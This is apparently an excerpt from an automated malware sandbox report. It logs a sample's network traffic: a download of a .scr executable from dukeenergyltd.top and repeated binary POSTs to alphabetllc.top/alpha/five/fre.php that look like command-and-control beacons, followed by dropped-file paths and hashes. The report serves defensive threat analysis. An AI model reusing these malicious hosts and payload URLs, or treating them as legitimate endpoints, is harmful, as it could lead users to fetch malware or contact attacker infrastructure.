User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alphabetllc.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 5C35B926
Content-Length: 153
Connection: close
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.16
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Isa6hQVIqGEzViYd4tfeoHaTh1dh88ms1oiq%2F4YNYe6hYI5UnO5VaMBqUXuFfTXWA%2FXITOv%2Fw7HINPeuZi5sSmU7dgyQyNNzPndFB00LGrKYrA5iO641luWV5gxUuLVGub4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8927c4e2afdd635f-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.79.102:80RequestPOST /alpha/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alphabetllc.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 5C35B926
Content-Length: 153
Connection: close
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.16
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6jdAUxE%2BQj670m2xzzkgG3WHlLH%2FSuw9aBJmpk%2BCMR2hS%2BclqLPV8LUCszEPsE3GP54M2IwwWhTrltvvy3JsPEtQH8HfVYIoHfdSBJE3ln7TbUD4JgNVDwimHL0DnfqD60%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8927c65b6b9f93ed-LHR
alt-svc: h3=":443"; ma=86400
-
12.5kB 652.3kB 256 495
HTTP Request
GET https://dukeenergyltd.top/alphaz.scrHTTP Response
200 -
890 B 869 B 6 6
HTTP Request
POST http://alphabetllc.top/alpha/five/fre.phpHTTP Response
404 -
696 B 869 B 6 6
HTTP Request
POST http://alphabetllc.top/alpha/five/fre.phpHTTP Response
404 -
669 B 879 B 6 6
HTTP Request
POST http://alphabetllc.top/alpha/five/fre.phpHTTP Response
404 -
669 B 877 B 6 6
HTTP Request
POST http://alphabetllc.top/alpha/five/fre.phpHTTP Response
404 -
623 B 879 B 5 6
HTTP Request
POST http://alphabetllc.top/alpha/five/fre.phpHTTP Response
404
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a52309e841064384aa48fdf9392e78d0
SHA14352f8a817268f71e1fb97b10fb6460c7521e891
SHA256848edbd46b7080201440e8637689f5e4495f5384056373400f79847265de4b27
SHA5128679b4bd342aa9a1e774ab8430f563db218a438b812ff0cc08d8c0623669183d3d4f606b46b605aa75b39063208cf3366837eb48acfcea7966c2262ce84838a2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
20KB
MD52bfcc6bc24911dc8d87edd270c14a5f0
SHA16144ac2c4a3b09410010b5247ac14e338af3d528
SHA2566f8fffb058286b8a51f66fde5efb26b4557f8da0225ed941fbfa2d8fabbdf7f4
SHA51284819f136360963369521a0473b92fb22d8efe16a8ef41645c607e9ed00d93e192ebfb08898be7b8fbfa88e0ec8961def5d66222db2be93c67380f3e39fdafca
-
Filesize
606KB
MD57f84fcf457a46b922d6a1b4c8773dc9d
SHA1cd08dc3047946777419a7ea00d82764061cf84ab
SHA25652bcfea0c53b74e2b84b54d5b9c5d4b3f214017063e3b3339bf95c84ab62f485
SHA512584777150643035a12e71e535d8479b7df87d4c8d31423bee97d517b6b770814ede6135e44fbb984bbe31dbcfd8e5b8b90592b5050c35c07e470bfbfd199db5e